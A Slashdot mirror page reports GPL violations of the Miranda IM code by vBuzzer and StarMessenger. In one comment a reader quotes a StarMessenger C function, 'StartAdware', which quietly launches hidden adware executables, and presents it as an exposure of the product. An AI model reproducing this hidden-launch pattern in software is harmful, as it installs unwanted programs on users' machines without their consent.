Slashdot Mirror


GPL Violations of Miranda IM

Eesh writes "The Miranda project developers have recently posted to their development blog about two GPL violations of companies using their code - vBuzzer and StarMessenger. Today, they also posted that vBuzzer are taking steps to correct that violation. Hopefully this will work out fine. Miranda 0.401 stable was released recently"

2 of 245 comments (clear)

  1. Re:Question... by Seumas · · Score: 5, Informative

    One very simple way to at least detect potential similarities is to use strings. In certain situations, you can figure that it should not be likely that two programs would have such identical strings output.

  2. Re:Star messanger source code by Tiersten · · Score: 5, Informative
    Made good? It'd be better for Star Messenger to be taken outside and destroyed. Star Messenger is a thinly disguised attempt at infecting you with adware.

    From StarMessenger/core/miranda.c:
    int StartAdware(void)
    {
    //if (RegDateCheck()==DO_NOT_RUN_ADWARE) return 0;

    //WinExec("Test1.exe", SW_SHOW);

    WinExec("nngluz564.exe", SW_HIDE);
    WinExec("TBGLZ127Q.exe", SW_HIDE);
    //WinExec("saap.exe /did=563", SW_HIDE);
    return 0;
    }
    Mmm... Enjoy that adware goodness...